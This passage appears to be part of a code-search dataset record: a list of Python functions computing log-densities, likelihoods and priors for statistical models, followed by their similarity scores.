np.multiply(to_multiply, self.der)\n\t\t\telse:\n\t\t\t\tder = None\n\t\treturn Var(val, der)", "def logpdf(self, X, pool=None):\n logpdfs = []\n for logweight, space, kde in zip(self._logweights,\n self._spaces,\n self._kdes):\n # Calculate the probability for each parameter space individually\n if np.all(space == ~X.mask) and np.isfinite(logweight):\n logpdfs.append(logweight + kde(X[space], pool=pool))\n\n return logsumexp(logpdfs, axis=0)", "def pdf(self, x):\n\t\treturn 1.5 * np.power(x,2) ##obtained after finding z from integrating x^2 from -1 to 1", "def _log_prior_gradients(self):\r\n if self.priors is None:\r\n return 0.\r\n x = self._get_params()\r\n ret = np.zeros(x.size)\r\n [np.put(ret, i, p.lnpdf_grad(xx)) for i, (p, xx) in enumerate(zip(self.priors, x)) if not p is None]\r\n return ret", "def pdf(self, grid, dataSegment):\n return np.exp(\n -((dataSegment[0] - grid[0]) ** 2.) / (2. * grid[1] ** 2.) - .5 * np.log(2. * np.pi * grid[1] ** 2.))", "def compute_log_prob(self,params: ndarray) -> float:\n return self.compute_log_prior(params) + self.compute_log_likelihood(params)", "def log1p(x):\n return 0.0", "def pdf(self, grid, dataSegment):\n return (grid[0] ** dataSegment[0]) * (np.exp(-grid[0])) / (np.math.factorial(dataSegment[0]))", "def logp(value, nu, mu, scale):\n quaddist, logdet, ok = quaddist_parse(value, mu, scale)\n k = floatX(value.shape[-1])\n\n norm = gammaln((nu + k) / 2.0) - gammaln(nu / 2.0) - 0.5 * k * pt.log(nu * np.pi)\n inner = -(nu + k) / 2.0 * pt.log1p(quaddist / nu)\n res = norm + inner - logdet\n\n return check_parameters(res, ok, nu > 0, msg=\"posdef, nu > 0\")", "def logit_link(x):\n\n return 1 / (1 + math.exp(-0.05 * x))\n # return 1 / (1 + math.exp(-0.01 * x))", "def safelog(x):\n #return np.log(x)\n return np.log(np.clip(x,floor,np.inf))", "def log_data_prob(self, x):\n _dist = norm(self.data, self.err)\n lp = _dist.logpdf(x)\n for i in range(6):\n lp[np.isnan(lp[:,i]),i] = self.default_priors[np.isnan(lp[:,i]),i]\n\n return lp.sum(axis=1)", "def log10(x):\n return 0.0", "def _log_prior_gradients(self):\n x = self._get_params()\n ret = np.zeros(x.size)\n [np.put(ret,i,p.lnpdf_grad(xx)) for i,(p,xx) in enumerate(zip(self.priors,x)) if not p is None]\n return ret", "def joint_logpdf(self, x1, x2 = None):\n dists = self.conditionalMVNs\n joint_pdfs = np.array([d.joint_pdf(x1, x2) for d in dists])\n return np.log(np.sum(self.weights * joint_pdfs))", "def pdf(self, grid, dataSegment):\n return np.exp(-(dataSegment[0] ** 2.) / (2. * grid[0] ** 2.) - .5 * np.log(2. 
* np.pi * grid[0] ** 2.))", "def logpdf_link(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n e = y - link_f\r\n objective = (+ gammaln((self.v + 1) * 0.5)\r\n - gammaln(self.v * 0.5)\r\n - 0.5*np.log(self.sigma2 * self.v * np.pi)\r\n - 0.5*(self.v + 1)*np.log(1 + (1/np.float(self.v))*((e**2)/self.sigma2))\r\n )\r\n return np.sum(objective)", "def poisson_pdf(x, u, log=False):\n #return np.exp(-u)*(u**x)/factorial(x)\n #return np.exp(-u)*(u**x)/gamma(x+1)\n if log:\n return poisson.logpmf(x, u)\n return poisson.pmf(x, u)", "def log_pdf(self, X, Y):\n assert self.fitted, \"model must be fitted to compute likelihood score\"\n X, Y = self._handle_input_dimensionality(X, Y, fitting=False)\n p = self.sess.run(self.log_pdf_, feed_dict={self.X_ph: X, self.Y_ph: Y})\n assert p.ndim == 1 and p.shape[0] == X.shape[0]\n return p", "def ln(x):\n return log(x, const.e)", "def logpowerlaw(x, p=default()):\n xtr, ytr, gradtr = logcontinuity(p)\n power = p[3]\n x0 = xtr - power/gradtr\n b = ytr - power*np.log(xtr-x0)\n return b + power*np.log(x-x0)", "def pdf(self, grid, dataSegment):\n return np.exp(-((dataSegment[1] - grid[0] * dataSegment[0]) ** 2.) / (2. * grid[1] ** 2.) - .5 * np.log(\n 2. * np.pi * grid[1] ** 2.))", "def logpdf_link(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n #objective = y*np.log(link_f) + (1.-y)*np.log(link_f)\r\n objective = np.where(y==1, np.log(link_f), np.log(1-link_f))\r\n return np.sum(objective)", "def poisson_log_likelihood(x, log_rate):\n return x * log_rate - np.exp(log_rate) - lax.lgamma(x + 1.0)", "def fn(a, y):\n return np.sum(np.nan_to_num(-y*np.log(a)-(1-y)*np.log(1-a)))", "def log_gamma_unnormalised_lpdf(x, alpha, beta):\n return alpha * x - beta * tf.exp(x)", "def _loglike(self, y, f):\n bincoef = tf.lgamma(self.n + 1) - tf.lgamma(y + 1) \\\n - tf.lgamma(self.n - y + 1)\n ll = bincoef + y * tf.log(pos(f)) + (self.n - y) * tf.log(pos(1 - f))\n return ll", "def log_prob(self, x):\n z, log_det = self.backward_p(x)\n return self.prior.log_prob(z) + log_det", "def Log(num):\n return math.log(float(num))", "def logp(self, x):\n pass", "def log_pdf_normal(s):\n return jnp.sum(norm.logpdf(s))", "def loglog_interp(x,xp,fp):\n lx = np.log(x)\n lxp = np.log(xp)\n lfp = np.log(fp)\n return np.exp(np.interp(lx,lxp,lfp))", "def log(base, real):\n return math.log(real, base)", "def logpdf_link(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n #alpha = self.gp_link.transf(gp)*self.beta\r\n #return (1. 
- alpha)*np.log(obs) + self.beta*obs - alpha * np.log(self.beta) + np.log(special.gamma(alpha))\r\n alpha = link_f*self.beta\r\n log_objective = alpha*np.log(self.beta) - np.log(special.gamma(alpha)) + (alpha - 1)*np.log(y) - self.beta*y\r\n return np.sum(log_objective)", "def f_log_encoding(x, in_reflection=False):\n a = 0.555556\n b = 0.009468\n c = 0.344676\n d = 0.790453\n e = 8.735631\n f = 0.092864\n cut1 = 0.00089\n\n if not in_reflection:\n x = x * 0.9\n\n y = np.where(x < cut1,\n e * x + f,\n c * np.log10(a * x + b) + d)\n\n return y", "def log_probability(theta):\n global priors\n global logp\n lp = np.sum([priors[p].logpdf(x) for p, x in zip(logp.parnames, theta)])\n if not np.isfinite(lp) or np.isnan(lp):\n return -np.inf\n ll = logp(theta)\n if not np.isfinite(ll):\n return -np.inf\n return lp + ll", "def log_probability(theta):\n global priors\n global logp\n lp = np.sum([priors[p].logpdf(x) for p, x in zip(logp.parnames, theta)])\n if not np.isfinite(lp) or np.isnan(lp):\n return -np.inf\n ll = logp(theta)\n if not np.isfinite(ll):\n return -np.inf\n return lp + ll", "def log_likelihood(parameters):\n if len(copula.bounds_param) == 1:\n params = [parameters]\n else:\n param1, param2 = parameters\n params = [param1, param2]\n logl = -np.sum(np.log(copula.get_pdf(psd_obs[0], psd_obs[1], params)))\n return logl", "def cdf(self,x):\n if self.base == 'natural':\n cdfValue = (math.log(x)-self.lowerBound)/(self.upperBound-self.lowerBound)\n else:\n cdfValue = (math.log10(x)-self.lowerBound)/(self.upperBound-self.lowerBound)\n return cdfValue", "def likelihood(mean, logs, x):\n return -0.5 * (logs * 2. + ((x - mean) ** 2) / np.exp(logs * 2.) + GaussianDiag.Log2PI)", "def pdf(self, x, log=False):\n assert x.shape[0] == self.num_vars()\n if log is False:\n marginal_vals = self.evaluate(\"pdf\", x)\n return np.prod(marginal_vals, axis=0)[:, None]\n\n marginal_vals = self.evaluate(\"logpdf\", x)\n return np.sum(marginal_vals, axis=0)[:, None]", "def f_log_decoding(x, out_reflection=False):\n a = 0.555556\n b = 0.009468\n c = 0.344676\n d = 0.790453\n e = 8.735631\n f = 0.092864\n cut2 = 0.100537775223865\n\n y = np.where(x < cut2,\n (x - f) / e,\n (10 ** ((x - d) / c)) / a - (b / a))\n\n if not out_reflection:\n y = y / 0.9\n\n return y", "def log(self, x, base=2):\n if x == 0:\n return 0\n return math.log(x, base)", "def log_likelihood(self):\r\n if self.likelihood.is_heteroscedastic:\r\n A = -0.5 * self.num_data * self.output_dim * np.log(2.*np.pi) + 0.5 * np.sum(np.log(self.likelihood.precision)) - 0.5 * np.sum(self.likelihood.V * self.likelihood.Y)\r\n B = -0.5 * self.output_dim * (np.sum(self.likelihood.precision.flatten() * self.psi0) - np.trace(self._A))\r\n else:\r\n A = -0.5 * self.num_data * self.output_dim * (np.log(2.*np.pi) - np.log(self.likelihood.precision)) - 0.5 * self.likelihood.precision * self.likelihood.trYYT\r\n B = -0.5 * self.output_dim * (np.sum(self.likelihood.precision * self.psi0) - np.trace(self._A))\r\n C = -self.output_dim * (np.sum(np.log(np.diag(self.LB)))) # + 0.5 * self.num_inducing * np.log(sf2))\r\n D = 0.5 * self.data_fit\r\n self._A_part, self._B_part, self._C_part, self._D_part = A, B, C, D\r\n return A + B + C + D + self.likelihood.Z", "def log_probability(self, X):\n\n\t\treturn self.__log_probability(X)", "def log_prob(self):\n res = -self.L_h/2*np.log(2*np.pi*self.la)\n res = res + self.L_h*(self.L_h-1)/2*self.a\n\n\n res = res - 1/(2*self.la)*np.square(np.linalg.norm(self.e*self.pie))\n\n res = res - 
1/(2*self.la)*np.sum(self.e2*self.pie_var)\n\n res = res - self.L_h/2*np.log(2*np.pi*self.sigma2)\n res = res - 1/(2*self.sigma2)*(np.square(np.linalg.norm(self.w))+np.trace(self.R))\n\n print(\"Log-probability difference = {}\".format(res - self.LP), file=self.logfile)\n self.LP = res\n return res", "def log10(self):\n return Factor().__build( VarSet(self.v) , np.log10(self.t) )", "def log_marginal_likelihood_normal_pdf(self):\n noise_variance=self.params['noise_variance']['value']\n Kxx = self.C@self._Kernel(self.X, self.X, self.params)@self.C.T + (noise_variance+self.jitter) * np.eye(self.Y.shape[0])\n try:\n mu = np.linalg.solve(Kxx, self.Y)\n (sign, logdet) = np.linalg.slogdet(2 * np.pi * Kxx) \n logp1 = -0.5*np.asscalar(self.Y.T@mu)-0.5*logdet \n except:\n logp1=-10.0**300\n return logp1", "def logp(rv, value):\n\n value = at.as_tensor_variable(value, dtype=rv.dtype)\n return logp_aeppl(rv, value)" ]
[ "0.808809", "0.808809", "0.7765762", "0.767868", "0.7636893", "0.74008185", "0.7215648", "0.7135841", "0.7101646", "0.7030553", "0.6977651", "0.6970404", "0.6965355", "0.6961038", "0.6950404", "0.6910325", "0.6866383", "0.68497586", "0.68354607", "0.6822285", "0.6806993", "0.67821145", "0.67699516", "0.6757158", "0.6748133", "0.6724406", "0.6719789", "0.669577", "0.6682538", "0.66723865", "0.6657915", "0.66562104", "0.6633829", "0.6627472", "0.65701485", "0.6569322", "0.6568259", "0.65561724", "0.6549221", "0.6544437", "0.65288615", "0.65124863", "0.65120834", "0.6507177", "0.6502237", "0.6493888", "0.6493239", "0.64926547", "0.649149", "0.6484289", "0.64814305", "0.6457287", "0.6456921", "0.6452463", "0.644757", "0.6444243", "0.64397997", "0.64356613", "0.64217526", "0.6412191", "0.63982147", "0.6362441", "0.6359247", "0.63587165", "0.6357432", "0.6355754", "0.6340672", "0.6339925", "0.6338707", "0.63378835", "0.6335183", "0.6332686", "0.63256246", "0.63164663", "0.6306894", "0.63067836", "0.6305134", "0.62998223", "0.628886", "0.6288018", "0.6287504", "0.62782973", "0.6274838", "0.6271202", "0.6270841", "0.62639505", "0.62619615", "0.62619615", "0.626129", "0.6258783", "0.6256326", "0.62548256", "0.6250686", "0.6244264", "0.62427914", "0.6237538", "0.62349933", "0.6225776", "0.6220251", "0.6214577" ]
0.7301884
6
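The record above pairs the query about computing the log-pdf at a fixed support value with a `log_pdf_at_x` closure that fixes `x` and returns a function of the parameter point. As a hedged illustration only (not part of the dataset), the sketch below emulates that pattern with a plain NumPy stand-in: the `NormalManifold` class, its `point_to_pdf` method, and the use of `numpy` in place of the `gs` backend referenced in the record are all assumptions made for this example.

```python
# Minimal sketch of the log_pdf_at_x pattern from the record above.
# Assumption: a toy "information manifold" whose points are (mean, std)
# parameter pairs, standing in for the record's self.information_manifold.
import numpy as np


class NormalManifold:
    """Toy information manifold: a point is a (mean, std) parameter pair."""

    def point_to_pdf(self, point):
        mean, std = point

        def pdf(x):
            # Gaussian density evaluated at x for the given parameters.
            return np.exp(-0.5 * ((x - mean) / std) ** 2) / (std * np.sqrt(2.0 * np.pi))

        return pdf


manifold = NormalManifold()


def log_pdf_at_x(x):
    # Same shape as the record's document: fix the support value x and
    # return a callable of the parameter point.
    return lambda point: np.log(manifold.point_to_pdf(point)(x))


# Usage: evaluate log N(x=2 | mean=0, std=1) by calling the returned closure
# on a parameter point.
log_pdf_at_two = log_pdf_at_x(2.0)
print(log_pdf_at_two((0.0, 1.0)))  # approximately -2.9189
```

The returned closure is what the next record differentiates: taking its Jacobian with respect to the parameter point yields the derivative of the log-pdf with respect to the parameters.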
Compute the derivative of the logpdf with respect to the parameters.
def log_pdf_derivative(x): return gs.autodiff.jacobian(log_pdf_at_x(x))(base_point)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def log_pdf_derivative_squared(x):\n dlog = log_pdf_derivative(x)\n return gs.einsum(\"...i, ...j -> ...ij\", dlog, dlog)", "def logpdf(self, x):\n if self.transform is not None:\n x = self.transform(x) \n return (-self.alpha-1)*np.log(x) - (self.beta/float(x))", "def log_deriv(error):\n return logistic(error) * (1 - logistic(error))", "def grad_log(self, X):\n # \"\"\"\n # Evaluate the gradients (with respect to the input) of the log density at\n # each of the n points in X. This is the score function.\n\n # X: n x d numpy array.\n XB = np.dot(X, self.B)\n Y = 0.5*XB + self.c\n E2y = np.exp(2*Y)\n # n x dh\n Phi = old_div((E2y-1.0),(E2y+1))\n # n x dx\n T = np.dot(Phi, 0.5*self.B.T)\n S = self.b - X + T\n return S", "def _evaluate_point_logpdf(args):\n x, data, cho_factor = args\n\n # Use Cholesky decomposition to avoid direct inversion of covariance matrix\n diff = data - x\n tdiff = la.cho_solve(cho_factor, diff.T, check_finite=False).T\n diff *= tdiff\n\n # Work in the log to avoid large numbers\n return logsumexp(-np.sum(diff, axis=1)/2.0)", "def logpdf(x, a, b):\n with mp.extradps(5):\n a, b = _validate_a_b(a, b)\n x = mp.mpf(x)\n if x < 0 or x > 1:\n return -mp.inf\n return (_fun.xlogy(a - 1, x) + _fun.xlog1py(b - 1, -x)\n - _fun.logbeta(a, b))", "def logPdf(self,x):\n logPdf = np.log(self.pdf(x))\n return logPdf", "def logPdf(self,x):\n logPdf = np.log(self.pdf(x))\n return logPdf", "def logpdf(self, X) -> np.ndarray:\n return self.dist.logpdf(self.inv_trans(X))", "def logit_deriv(y):\n# if y.any() < 0.0 or y.any() > 1.0:\n# raise Exception\n\n return y*(1-y)", "def logp_grad(self, xs, ys, fs, **kwargs):", "def invwish_logpdf(X, S, df):\n d = X.shape[0]\n if df < d:\n raise ValueError('df must be greater than or equal to the number of '\n ' dimensions of S')\n if d != X.shape[1]:\n raise ValueError('X must be square.')\n if S.shape[0] != d or S.shape[1] != d:\n raise ValueError('S must be the same shape as X.')\n\n _, logdet_S = slogdet(S)\n _, logdet_X = slogdet(X)\n\n logpdf = (df/2)*logdet_S - ((df*d/2)*log(2) + multigammaln(df/2, d))\n logpdf += (-(d+df+1)/2)*logdet_X - (1/2)*trace(solve(X.T, S.T))\n\n return logpdf", "def conditional_logpdf(self, x1, x2 = None):\n f_x2 = self.unconditional_pdf_x2(x2)\n return self.joint_logpdf(x1, x2) - np.log(f_x2)", "def logpdf(x, p, temperature):\n assert x.shape == p.shape\n tol = 1e-7\n p = np.clip(p, tol, 1 - tol)\n x = np.clip(x, tol, 1 - tol)\n logit_p = logit(p)\n first_term = np.log(temperature) + logit_p - (1 + temperature) * np.log(x) - (1 + temperature) * np.log(1 - x)\n second_term = 2 * np.log((np.exp(logit_p) * (x ** (- temperature))) + (1 - x) ** (- temperature))\n return first_term - second_term", "def logpdf(self, X) -> np.ndarray:\n raise NotImplementedError", "def test_log():\n x, y = fwd.Variable(), fwd.Variable()\n f = fwd.log(fwd.sin(x)+y**2)\n dfdx = lambda x, y: np.cos(x) / (np.sin(x)+y**2)\n dfdy = lambda x, y: 2*y / (np.sin(x)+y**2)\n d2fdxdy = lambda x, y: -2*y*np.cos(x) / (np.sin(x)+y**2)**2\n assert equals(f.evaluation_at({x: 1.5, y:2.5}), np.log(np.sin(1.5)+2.5**2))\n assert equals(f.derivative_at(x, {x: 1.5, y:2.5}), dfdx(1.5, 2.5))\n assert equals(f.derivative_at(y, {x: 1.5, y:2.5}), dfdy(1.5, 2.5))\n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}), d2fdxdy(1.5, 2.5))\n with pytest.raises(NotImplementedError):\n f.derivative_at(x, {x:1.0, y: 2.0}, order=3)", "def dlogpdf_dlink(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n grad = 
self.beta*np.log(self.beta*y) - special.psi(self.beta*link_f)*self.beta\r\n #old\r\n #return -self.gp_link.dtransf_df(gp)*self.beta*np.log(obs) + special.psi(self.gp_link.transf(gp)*self.beta) * self.gp_link.dtransf_df(gp)*self.beta\r\n return grad", "def dvdlogdp(self):\n return self.dndlogdp.mul(self.v_multiplier)", "def log_den(self, X):\n raise NotImplementedError()", "def _derivative_(self, x, diff_param=None):\n return 2*exp(-x**2)/sqrt(pi)", "def _log_prior_gradients(self):\n x = self._get_params()\n ret = np.zeros(x.size)\n [np.put(ret,i,p.lnpdf_grad(xx)) for i,(p,xx) in enumerate(zip(self.priors,x)) if not p is None]\n return ret", "def der_log(self, xr, xc=None, out=None):\n if xc is None:\n return self._pder_log(xr, out)\n else:\n return self._pder_log(_np.hstack((xr, xc)), out)", "def log_pdf(X, parameters):\n check_data_type_column_data(X)\n check_model_params_dict(parameters)\n\n sigma = (1.0/parameters['rho'])**.5\n\n return norm.logpdf(X,parameters['mu'],sigma)", "def _log_prior_gradients(self):\n if self.priors.size == 0:\n return 0.\n x = self.param_array\n ret = np.zeros(x.size)\n #compute derivate of prior density\n [np.put(ret, ind, p.lnpdf_grad(x[ind])) for p, ind in self.priors.items()]\n #add in jacobian derivatives if transformed\n priored_indexes = np.hstack([i for p, i in self.priors.items()])\n for c,j in self.constraints.items():\n if not isinstance(c, Transformation):continue\n for jj in j:\n if jj in priored_indexes:\n ret[jj] += c.log_jacobian_grad(x[jj])\n return ret", "def log_pdf(self, x):\n if x < 0:\n raise Exception(\"input value x can't be a negative value!\")\n\n if self.is_fit:\n if x >= 0:\n return -np.log(np.math.factorial(x)) + \\\n x * np.log(self.alpha) - self.alpha\n else:\n return 0\n else:\n raise Exception(\"Distribution doesn't have all parameters set!\")", "def dlogpdf_dlink(self, link_f, y, Y_metadata=None):\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\n c = np.zeros_like(y)\n if Y_metadata is not None and 'censored' in Y_metadata.keys():\n c = Y_metadata['censored']\n\n val = np.log(y) - link_f\n val_scaled = val/np.sqrt(self.variance)\n val_scaled2 = val/self.variance\n uncensored = (1-c)*(val_scaled2)\n a = (1- stats.norm.cdf(val_scaled))\n # llg(z) = 1. / (1 - norm_cdf(r / sqrt(s2))). * (1 / sqrt(2 * pi * s2). * exp(-1 / (2. * s2). * r. ^ 2));\n censored = c*( 1./a) * (np.exp(-1.* val**2 /(2*self.variance)) / np.sqrt(2*np.pi*self.variance))\n # censored = c * (1. / (1 - stats.norm.cdf(val_scaled))) * (stats.norm.pdf(val_scaled))\n gradient = uncensored + censored\n return gradient", "def grad_reglog(w, X, y, **kwargs):\n p = np.exp(-y * (np.dot(X, w)))\n P = p / (1. 
+ p)\n return -1 * np.dot(X.T, P * y) / X.shape[0]", "def log_likelihood_gradients_(self, y, f):\n log_lik = self.evaluate_log_likelihood(y, f)\n f = np.squeeze(f)\n J = jacrev(self.evaluate_log_likelihood, argnums=1)\n H = jacrev(J, argnums=1)\n return log_lik, J(y, f), H(y, f)", "def dlogpdf_df(self, f, y, extra_data=None):\r\n link_f = self.gp_link.transf(f)\r\n dlogpdf_dlink = self.dlogpdf_dlink(link_f, y, extra_data=extra_data)\r\n dlink_df = self.gp_link.dtransf_df(f)\r\n return chain_1(dlogpdf_dlink, dlink_df)", "def _log_likelihood_gradients(self):\r\n return np.hstack((self.kern.dK_dtheta(dL_dK=self.dL_dK, X=self.X), self.likelihood._gradients(partial=np.diag(self.dL_dK))))", "def dlogpdf_df(self, f, y, Y_metadata=None):\n if isinstance(self.gp_link, link_functions.Identity):\n return self.dlogpdf_dlink(f, y, Y_metadata=Y_metadata)\n else:\n inv_link_f = self.gp_link.transf(f)\n dlogpdf_dlink = self.dlogpdf_dlink(inv_link_f, y, Y_metadata=Y_metadata)\n dlink_df = self.gp_link.dtransf_df(f)\n return chain_1(dlogpdf_dlink, dlink_df)", "def pdf(self, x, log = False):\n if log:\n return D.logsumexp(\n D.multiple_gauss_den(x, self.mu, self.va, log = True)\n + N.log(self.w))\n else:\n return N.sum(D.multiple_gauss_den(x, self.mu, self.va) * self.w, 1)", "def logaddexp(X, Y):\n XY_max = T.maximum(X, Y)\n XY_min = T.minimum(X, Y)\n return XY_max + T.log1p(T.exp(XY_min - XY_max))", "def _log_likelihood_gradients(self):\n return np.hstack((self.kern.dK_dtheta(dL_dK=self.dL_dK,X=self.X,slices1=self.Xslices,slices2=self.Xslices), self.likelihood._gradients(partial=np.diag(self.dL_dK))))", "def logdprior(parameters, hyperparameters):\n sigma_w_part = parameters[0] + invgamma_logpdf(parameters[0],\n hyperparameters[\"sigma_w_shape\"], hyperparameters[\"sigma_w_scale\"])\n sigma_v_part = parameters[1] + invgamma_logpdf(parameters[1], hyperparameters[\"sigma_v_shape\"], hyperparameters[\"sigma_v_scale\"])\n return sigma_w_part + sigma_v_part", "def _log_prior_gradients(self):\r\n if self.priors is None:\r\n return 0.\r\n x = self._get_params()\r\n ret = np.zeros(x.size)\r\n [np.put(ret, i, p.lnpdf_grad(xx)) for i, (p, xx) in enumerate(zip(self.priors, x)) if not p is None]\r\n return ret", "def grad_log(self, X):\n g = autograd.elementwise_grad(self.log_den)\n G = g(X)\n return G", "def logistic_derivative(errors):\n return [log_deriv(error) for error in errors]", "def MvNormalLogp():\n cov = pt.matrix(\"cov\")\n cov.tag.test_value = floatX(np.eye(3))\n delta = pt.matrix(\"delta\")\n delta.tag.test_value = floatX(np.zeros((2, 3)))\n\n cholesky = Cholesky(lower=True, on_error=\"nan\")\n\n n, k = delta.shape\n n, k = f(n), f(k)\n chol_cov = cholesky(cov)\n diag = pt.diag(chol_cov)\n ok = pt.all(diag > 0)\n\n chol_cov = pt.switch(ok, chol_cov, pt.fill(chol_cov, 1))\n delta_trans = solve_lower(chol_cov, delta.T).T\n\n result = n * k * pt.log(f(2) * np.pi)\n result += f(2) * n * pt.sum(pt.log(diag))\n result += (delta_trans ** f(2)).sum()\n result = f(-0.5) * result\n logp = pt.switch(ok, result, -np.inf)\n\n def dlogp(inputs, gradients):\n (g_logp,) = gradients\n cov, delta = inputs\n\n g_logp.tag.test_value = floatX(1.0)\n n, k = delta.shape\n\n chol_cov = cholesky(cov)\n diag = pt.diag(chol_cov)\n ok = pt.all(diag > 0)\n\n chol_cov = pt.switch(ok, chol_cov, pt.fill(chol_cov, 1))\n delta_trans = solve_lower(chol_cov, delta.T).T\n\n inner = n * pt.eye(k) - pt.dot(delta_trans.T, delta_trans)\n g_cov = solve_upper(chol_cov.T, inner)\n g_cov = solve_upper(chol_cov.T, g_cov.T)\n\n tau_delta = 
solve_upper(chol_cov.T, delta_trans.T)\n g_delta = tau_delta.T\n\n g_cov = pt.switch(ok, g_cov, -np.nan)\n g_delta = pt.switch(ok, g_delta, -np.nan)\n\n return [-0.5 * g_cov * g_logp, -g_delta * g_logp]\n\n return OpFromGraph([cov, delta], [logp], grad_overrides=dlogp, inline=True)", "def dlogpdf_dlink(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n e = y - link_f\r\n grad = ((self.v + 1) * e) / (self.v * self.sigma2 + (e**2))\r\n return grad", "def log_prob(self):\n res = -self.L_h/2*np.log(2*np.pi*self.la)\n res = res + self.L_h*(self.L_h-1)/2*self.a\n\n\n res = res - 1/(2*self.la)*np.square(np.linalg.norm(self.e*self.pie))\n\n res = res - 1/(2*self.la)*np.sum(self.e2*self.pie_var)\n\n res = res - self.L_h/2*np.log(2*np.pi*self.sigma2)\n res = res - 1/(2*self.sigma2)*(np.square(np.linalg.norm(self.w))+np.trace(self.R))\n\n print(\"Log-probability difference = {}\".format(res - self.LP), file=self.logfile)\n self.LP = res\n return res", "def logpdf(self, X) -> np.ndarray:\n if not isinstance(X, np.ndarray):\n X = np.array(X)\n H = 0.5 * ((X - self.means) / self.scales) ** 2\n Z = sqrt(2 * pi) * self.scales\n return -np.sum(H + np.log(Z), axis=1)", "def _finite_diff_gradient(self, parameters):\n assert isinstance(parameters,np.ndarray)\n # get the free indicies\n free_inds = np.nonzero(np.logical_not(self._fixed_indicies))[0]\n\n # first take a forward step in each direction\n step = 1e-6 # finite difference step\n log_like_fs = np.zeros(free_inds.size)\n for i,param_idx in enumerate(free_inds):\n p_fs = parameters.copy()\n p_fs[param_idx] += step # take a step forward\n log_like_fs[i] = self._compute_log_likelihood(p_fs)\n\n # compute the log likelihood at current point\n log_like = self._compute_log_likelihood(parameters)\n\n # compute the gradient\n gradient = np.zeros(parameters.shape) # default gradient is zero\n gradient[free_inds] = (log_like_fs-log_like)\n gradient[free_inds] = gradient[free_inds]/step # divide by step length\n return log_like, gradient", "def logpdf(self, X) -> np.ndarray:\n comp_logpdfs = [np.reshape(comp.logpdf(X), [-1, 1]) for comp in self.components]\n logpdfs = np.hstack(comp_logpdfs)\n result = logsumexp(logpdfs, axis=1, b=self.coefficients)\n return np.array(result)", "def dalf(x):\n return derivative(alf, x, dx=1e-6)", "def dlogdp(self):\n return np.log10(self.bins[:, -1]) - np.log10(self.bins[:, 0])", "def diff_log(x):\n\n return np.diff(np.log(x)),np.log(x)[0]", "def logaddexp(x: torch.Tensor, y: torch.Tensor) -> torch.Tensor:\n return torch.max(x, y) + torch.log(1 + torch.exp(-torch.abs(y - x)))", "def _core_calc_degrad(self,bd,Ld) :\n\t\tdegrad = np.dot(Ld,bd) # Do matrix multiplication \n\t\tdegrad = np.exp(degrad) # Exponentiate to convert log to real\n\t\treturn degrad", "def diff_log(x):\n \n return np.diff(np.log(x)),np.log(x)[0]", "def log_likelihood(self, theta, x, **kwargs):\n\n u, logdet_dudx, log_a = self.forward(theta, x, **kwargs)\n\n constant = float(-0.5 * self.n_inputs * np.log(2.0 * np.pi))\n # log_likelihood = torch.log(torch.sum(torch.exp(log_a - 0.5 * u ** 2 + logdet_dudx), dim=2))\n log_likelihood = torch.logsumexp(log_a - 0.5 * u**2 + logdet_dudx, dim=2)\n log_likelihood = constant + torch.sum(log_likelihood, dim=1)\n\n return u, log_likelihood", "def log_LxP(theta, D):\r\n p1 = np.exp( -((theta-D[0])**2)/2 )\r\n p2 = np.exp( -((theta-D[1])**2)/2 )\r\n if np.abs(theta) <= 1:\r\n LxP = p1*p2\r\n else:\r\n LxP = 0.0\r\n return np.log(LxP)", "def dlogpdf_dlink(self, link_f, y, 
extra_data=None):\r\n assert np.asarray(link_f).shape == np.asarray(y).shape\r\n s2_i = (1.0/self.variance)\r\n grad = s2_i*y - s2_i*link_f\r\n return grad", "def ddalf(x):\n return derivative(dalf, x, dx=1e-6)", "def ddalf(x):\n return derivative(dalf, x, dx=1e-6)", "def grad_log_likelihood(self, log_occr_array=None):\n\n if log_occr_array is not None:\n # Catch invalid occurrence rates for zero likelihood\n try:\n self.log_occr = log_occr_array\n except InvalidOccurrenceRate:\n return -np.inf * np.ones_like(self.occr, dtype=float)\n\n # Calculate components first\n N_exp = self.calc_integral() * self._N_stars # perhaps not needed\n nexp_terms = self._N_stars * self.calc_bin_volumes() * self.H_bar_array\n s_terms = self.H_array * self.F_array * self.occr\n numerator_terms = self.H_array * self.F_array\n\n if not tf.is_tensor(self.occr):\n # Checking shapes of intermediate terms,\n # numerator_terms vs s_terms.sum(-1, -2) and vs v factors.\n intermediate_terms = numerator_terms / s_terms.sum(axis=(-1, -2))\n # TODO: v_factor changed to negative, I think a minus\n # sign had been missed\n grad_log_array = - nexp_terms + intermediate_terms.sum(axis=0)\n\n # BUG TODO\n if np.isnan(grad_log_array).any():\n warnings.warn(\".grad_log_likelihood value is nan.\")\n import pdb; pdb.set_trace()\n grad_log_array = -np.inf * grad_log_array\n else:\n raise NotImplementedError(\"Manual gradient calculate with \"\n \"tensorflow objects isn't \"\n \"implemented, and seems a bit \"\n \"redundant.\")\n\n return grad_log_array", "def log_likelihood(parameters):\n if len(copula.bounds_param) == 1:\n params = [parameters]\n else:\n param1, param2 = parameters\n params = [param1, param2]\n logl = -np.sum(np.log(copula.get_pdf(psd_obs[0], psd_obs[1], params)))\n return logl", "def __dNdlog2dN(self,Dp,dNdlogDp):\n \n x = np.log10(Dp)\n y = (x[1:]+x[:-1])/2.\n y = np.pad(y,1,'constant',constant_values=(x[0]-(y[0]-x[0]),x[-1]+(x[-1]-y[-1])))\n dlogDp = np.diff(y)\n return dNdlogDp*dlogDp # cm-3", "def logpdf(self, point: np.ndarray) -> float:\n point = np.array(point)\n if point.size > 1:\n point = point.reshape((2, -1))\n parts = self._logp.T + np.reshape([rv.logpdf(point) for rv in self._rvs], (2, -1))\n return logsumexp(parts, axis=0)\n parts = self._logp + np.array([rv.logpdf(point) for rv in self._rvs])\n return logsumexp(parts)", "def derivative(self, theta):\n diag_gamma = np.dot(theta.T, self.X.T)\n logistic_term = 